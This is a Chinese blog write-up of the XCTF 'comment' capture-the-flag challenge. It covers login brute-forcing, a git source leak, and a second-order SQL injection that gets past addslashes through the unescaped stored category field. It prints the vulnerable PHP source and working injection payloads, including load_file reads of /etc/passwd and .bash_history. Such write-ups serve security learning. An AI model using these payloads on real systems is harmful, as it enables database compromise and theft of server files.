攻防世界-comment

本文揭秘了一次通过SQL注入漏洞逐步获取权限的过程,从登录信息爆破,到利用addslashes的绕过,再到利用未转义的category字段进行攻击。最终揭示了flag并展示了从HTML文件名到权限提升的详细步骤。
摘要由CSDN通过智能技术生成

在这里插入图片描述一个留言板在这里插入图片描述扫描目录,发现存在login.php界面。访问
在这里插入图片描述
给了我们一个并不完整的登录信息
爆破在这里插入图片描述得到后三位密码666在这里插入图片描述登录成功后发现返回之前的首页
在这里插入图片描述

根据题目描述,存在sql注入
扫描目录
在这里插入图片描述发现存在git源码泄露
扒取源码在这里插入图片描述发现write_do.php文件在这里插入图片描述没有什么信息
检查页面元素时发现在这里插入图片描述我们得到的码是不完整的,需要修复
修复完的源码如下:

<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
    header("Location: ./login.php");
    die();
}
if(isset($_GET['do'])){
switch ($_GET['do'])
{
case 'write':
    $category = addslashes($_POST['category']);
    $title = addslashes($_POST['title']);
    $content = addslashes($_POST['content']);
    $sql = "insert into board
            set category = '$category',
                title = '$title',
                content = '$content'";
    $result = mysql_query($sql);
    header("Location: ./index.php");
    break;
case 'comment':
    $bo_id = addslashes($_POST['bo_id']);
    $sql = "select category from board where id='$bo_id'";
    $result = mysql_query($sql);
    $num = mysql_num_rows($result);
    if($num>0){
    $category = mysql_fetch_array($result)['category'];
    $content = addslashes($_POST['content']);
    $sql = "insert into comment
            set category = '$category',
                content = '$content',
                bo_id = '$bo_id'";
    $result = mysql_query($sql);
    }
    header("Location: ./comment.php?id=$bo_id");
    break;
default:
    header("Location: ./index.php");
}
}
else{
    header("Location: ./index.php");
}
?>

比较重要的一个点是addslashes()函数的使用
在这里插入图片描述在这里插入图片描述
参考绕过addslashes
后台对输入的参数通过addslashes()对预定义字符进行转义,加上
预定义的字符包括单引号,双引号,反斜杠,NULL
放到数据库后会把转义符 \ 去掉(进入数据库后是没有反斜杠的),并存入数据库中
在这个php中
write的时候所有参数进行了转义才放到sql语句中
但是在comment中,对于category的值从数据库取出来没有进行转义,直接拼接到sql insert语句中
这就是注入位置了
于是思路清晰了:
通过发帖,在category中放入payload,存入数据库中
这一过程payload因为对单引号等作了转义,不会被触发
在发帖成功后,在留言comment,调用insert语句时因为没有对数据库取出的category进行转义,直接拼接触发payload

1',content=database(),/*

在这里插入图片描述点击详情在这里插入图片描述提交留言在这里插入图片描述我们可以看到已经返回给了我们数据库名
注入成功
再次同样的操作查看用户

1',content=user(),/*

在这里插入图片描述在这里插入图片描述可以看到我们是root权限,可以直接load_file了
先读取系统用户和用户的路径/etc/passwd

1',content=(select(load_file("/etc/passwd"))),/*

在这里插入图片描述
我们也不知道到底要看什么文件
那就看看他的操作历史:.bash_history文件:保存了当前用户使用过的历史命令
在这里插入图片描述有一个没见过的文件
在这里插入图片描述隐藏文件?
那就是他了
我们采用16进制的方法读取

1', content=(select hex(load_file('/tmp/html/.DS_Store'))),/*

在这里插入图片描述在这里插入图片描述Hex解码
在这里插入图片描述发现所有的html目录下的文件名都出来了
flag_8946e1ff1ee3e40f.phpllocblob是flag的文件名

1',content=(select hex(load_file("/tmp/html/flag_8946e1ff1ee3e40f.php"))),/*

在这里插入图片描述在这里插入图片描述

解码
在这里插入图片描述在这里插入图片描述???!!!!
人傻了在这里插入图片描述
仔细看看才发现html被复制了一份
在这里插入图片描述

1',content=(select hex(load_file('/var/www/html/flag_8946e1ff1ee3e40f.php'))),/*

在这里插入图片描述在这里插入图片描述解码得到真正的flag

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

一名无聊的网友

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值